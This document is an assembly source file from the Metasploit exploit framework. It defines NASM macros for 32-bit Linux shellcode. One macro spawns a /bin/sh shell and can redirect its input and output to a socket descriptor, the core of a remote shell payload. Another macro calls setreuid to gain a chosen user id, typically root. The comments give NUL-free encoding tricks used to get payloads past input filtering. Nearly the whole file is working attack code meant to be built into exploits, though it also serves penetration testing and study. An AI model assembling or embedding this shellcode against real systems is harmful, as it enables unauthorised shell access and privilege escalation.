GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/linux/ia32/generic.asm
;;
;
; Name: generic
; Type: Macro Set
; Qualities: None
; Authors: skape <mmiller [at] hick.org>
; Version: $Revision: 1407 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; This file provides a generic API of NASM macros (32-bit Linux,
; int 0x80 system calls) that can be used by payloads. No payloads are
; actually implemented within this file; each macro emits its shellcode
; inline at the point of use and honours the ASSUME_REG_* register
; assumptions defined below.
;
; Macro List:
;
; execve_binsh - Executes a command shell with flags
; setreuid - Set real/effective user id
;;
BITS 32

;;
; Define undefined assumptions
;
; ASSUME_REG_<reg> tells the macros in this file which registers the
; payload author guarantees to be zero on entry, so a shorter encoding
; can be emitted:
;
;   ASSUME_REG_EAX == 0 => syscall numbers are loaded with "mov al, N"
;                          instead of "push byte N / pop eax". This is
;                          only correct when the upper 24 bits of eax
;                          are already zero.
;   ASSUME_REG_EDX == 0 => the "cdq" that zeroes edx before execve is
;                          omitted, so edx must already be zero.
;
; Any other value (the default, -1) makes no assumption and emits the
; register-independent form.
;;
%ifndef ASSUME_REG_EDX
%define ASSUME_REG_EDX -1
%endif
%ifndef ASSUME_REG_EAX
%define ASSUME_REG_EAX -1
%endif
;;
; Macro: execve_binsh
; Purpose: Execute a command shell with various options
; Arguments:
;
;   Execution flags: Flags used for executing the command shell in a
;   number of modes (OR'd together).
;
;     EXECUTE_REDIRECT_IO      => Redirects stdin/stdout/stderr to the fd
;                                 passed in 'edi' (or already held in 'ebx'
;                                 when FD_REG_EBX is defined) with three
;                                 dup2() calls.
;     EXECUTE_DISABLE_READLINE => Disables readline support by passing
;                                 "--noediting -i" to the shell. This is
;                                 needed for redirection to UDP sockets.
;
; Registers: clobbers eax, ebx, ecx, edx, edi (edi only with
; EXECUTE_DISABLE_READLINE) and esp -- the path, argument strings and
; argv[] are built on the stack and never popped.
;
; Does not return on success, since execve() replaces the process image.
; On failure the syscall leaves -errno in eax and execution falls through
; to whatever follows the macro; no error path is emitted.
;
; NOTE(review): the dup2() return values are not checked. With
; ASSUME_REG_EAX == 0 the loop reloads the syscall number with
; "mov al, 0x3f", which relies on each dup2() having returned its small
; non-negative fd (2, 1, 0) so the upper bytes of eax stay zero; a failed
; dup2() (-errno) would corrupt the next syscall number.
;
; NOTE(review): "--noediting" is a bash option; if /bin/sh on the target
; is a different shell (e.g. dash) it may reject the argument -- verify
; on the target before relying on EXECUTE_DISABLE_READLINE.
;;
%define EXECUTE_REDIRECT_IO 0x0001
%define EXECUTE_DISABLE_READLINE 0x0002

%macro execve_binsh 1

%if %1 & EXECUTE_REDIRECT_IO

dup:
%ifdef FD_REG_EBX
        ; caller already placed the target fd in ebx
%else
        mov     ebx, edi                ; ebx = fd that 0/1/2 are redirected to
%endif
        push    byte 0x2
        pop     ecx                     ; ecx = 2, counts down to 0
dup_loop:
%if ASSUME_REG_EAX == 0
        mov     al, 0x3f                ; eax = __NR_dup2 (upper bytes assumed zero)
%else
        push    byte 0x3f
        pop     eax                     ; eax = __NR_dup2
%endif
        int     0x80                    ; dup2(ebx, ecx)
        dec     ecx
        jns     dup_loop                ; iterate for ecx = 2, 1, 0; stop at -1

%endif

execve:
%if ASSUME_REG_EAX == 0
        mov     al, 0xb                 ; eax = __NR_execve
%else
        push    byte 0xb
        pop     eax                     ; eax = __NR_execve
%endif
%if ASSUME_REG_EDX == 0
        ; edx assumed to be zero already
%else
        cdq                             ; edx = 0 (sign of the small positive eax)
%endif
        push    edx                     ; zero dword: NUL terminator for the string(s) below

%if %1 & EXECUTE_DISABLE_READLINE

        push    word 0x692d             ; "-i"
        mov     ecx, esp                ; ecx -> "-i\0" (NUL comes from the zero dword above)
        push    byte 0x67               ; "g\0\0\0" (push byte writes a full dword)
        push    word 0x6e69             ; "in"
        push    dword 0x74696465        ; "edit"
        push    dword 0x6f6e2d2d        ; "--no"
        mov     edi, esp                ; edi -> "--noediting\0"
        push    edx                     ; NUL terminator for the path
        push    dword 0x68732f2f        ; "//sh"
        push    dword 0x6e69622f        ; "/bin"

%else

        push    dword 0x68732f2f        ; "//sh" (doubled slash pads to 8 bytes without a NUL)
        push    dword 0x6e69622f        ; "/bin"

%endif

        mov     ebx, esp                ; ebx -> "/bin//sh\0" (filename argument)
        push    edx                     ; argv[] NULL terminator

%if %1 & EXECUTE_DISABLE_READLINE

        push    ecx                     ; argv[2] = "-i"
        push    edi                     ; argv[1] = "--noediting"

%endif

        push    ebx                     ; argv[0] = "/bin//sh"
        mov     ecx, esp                ; ecx = argv
        int     0x80                    ; execve(ebx, ecx, edx) with envp = NULL

%endmacro
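;;
; Macro: setreuid
; Purpose: Set real and effective user id (setreuid(uid, uid))
; Arguments:
;
;   User ID: The user identifier to setreuid to, typically 0.
;
; Registers: eax = __NR_setreuid (0x46), ebx = ecx = uid. Clobbers eax,
; ebx, ecx and flags; the syscall result (0 or -errno) is left in eax and
; is not checked.
;
; Encoding: uid 0 is loaded with "xor ecx, ecx" (2 bytes, NUL-free).
; Values 1..127 use "push byte imm8 / pop ecx"; push byte sign-extends
; its immediate, so 128..255 must NOT use that form (they would pop as
; 0xFFFFFF80..0xFFFFFFFF). Anything >= 128 uses "push dword imm32", which
; contains NUL bytes for most uids -- a concern if the payload must be
; NUL-free.
;
; NOTE(review): syscall 0x46 is the legacy 16-bit-uid setreuid on i386;
; a uid that does not fit in 16 bits is expected to need setreuid32
; (0xcb) instead -- confirm against the target kernel before using a
; large uid.
;;

%macro setreuid 1

setreuid:

%if %1 == 0

        xor     ecx, ecx                ; uid 0: shortest NUL-free encoding

%else

%if %1 < 128

        push    byte %1                 ; imm8 is sign-extended: only 0..127 are exact

%else

        push    dword %1

%endif

        pop     ecx                     ; ecx = euid

%endif

        mov     ebx, ecx                ; ebx = ruid (same value)
        push    byte 0x46
        pop     eax                     ; eax = __NR_setreuid
        int     0x80                    ; setreuid(ebx, ecx)

%endmacro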